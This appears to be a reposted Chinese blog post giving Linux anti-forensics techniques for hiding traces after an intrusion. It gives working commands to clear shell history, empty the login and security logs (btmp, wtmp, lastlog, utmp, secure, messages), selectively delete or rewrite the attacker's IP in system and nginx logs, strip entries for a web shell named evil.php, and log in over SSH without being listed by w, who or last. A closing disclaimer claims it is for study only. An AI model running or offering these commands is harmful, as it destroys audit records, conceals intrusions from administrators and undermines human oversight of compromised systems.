Linux 入侵痕迹清理技巧

清除history历史命令记录

vim ~/.bash_history
//编辑history记录文件,删除部分不想被保存的历史命令
history -c
//清除当前用户的history命令记录
HISTSIZE=0
//通过修改配置文件/etc/profile,使系统不再保存命令记录

清除系统日志痕迹

  • Linux 系统存在多种日志文件,来记录系统运行过程中产生的日志。
/var/log/btmp   记录所有登录失败信息,使用lastb命令查看
/var/log/lastlog 记录系统中所有用户最后一次登录时间的日志,使用lastlog命令查看
/var/log/wtmp    记录所有用户的登录、注销信息,使用last命令查看
/var/log/utmp    记录当前已经登录的用户信息,使用w,who,users等命令查看
/var/log/secure   记录与安全相关的日志信息
/var/log/message  记录系统启动后的信息和错误日志
  • 清空日志文件
[root@centos]# echo > /var/log/btmp 
[root@centos]# lastb             
//清除登陆系统失败的记录,查询不到登录失败信息
[root@centos]# echo > /var/log/wtmp  
[root@centos]# last              
//清除登录系统成功的记录,查询不到登录成功的信息
清除用户最后一次登录时间:echo > /var/log/lastlog          #lastlog命令
清除当前登录用户的信息:echo >   /var/log/utmp             #使用w,who,users等命令
清除安全日志记录:cat /dev/null >  /var/log/secure
清除系统日志记录:cat /dev/null >  /var/log/message
  • 删除/替换部分日志
    日志文件全部被清空,太容易被管理员察觉了,如果只是删除或替换部分关键日志信息,那么就可以完美隐藏攻击痕迹。
sed  -i '/自己的ip/'d  /var/log/messages
//删除所有匹配到字符串的行,比如以当天日期或者自己的登录ip
sed -i 's/192.168.166.85/192.168.1.1/g' secure
//全局替换登录IP地址

清除web入侵痕迹

sed -i 's/192.168.166.85/192.168.1.1/g' access.log
//直接替换日志IP地址
cat /var/log/nginx/access.log | grep -v evil.php > tmp.log
//使用grep -v来把我们的相关信息删除
cat tmp.log > /var/log/nginx/access.log/
//把修改过的日志覆盖到原日志文件

文件安全删除工具

实现安全的从硬盘上擦除数据,默认覆盖3次,通过 -n指定数据覆盖次数。


隐藏远程SSH登陆记录

ssh -T root@192.168.0.1 /bin/bash -i
//隐身登录系统,不会被w、who、last等指令检测到
ssh -o UserKnownHostsFile=/dev/null -T user@host /bin/bash –i
//不记录ssh公钥在本地.ssh目录中

转载链接

bypass-Linux 入侵痕迹清理技巧

声明

严禁读者利用以上介绍知识点对网站进行非法操作 , 本文仅用于技术交流和学习 , 如果您利用文章中介绍的知识对他人造成损失 , 后果由您自行承担 , 如果您不能同意该约定 , 请您务必不要阅读该文章 , 感谢您的配合 !

posted @ 2020-09-14 16:59  renblog  阅读(1346)  评论(1编辑  收藏  举报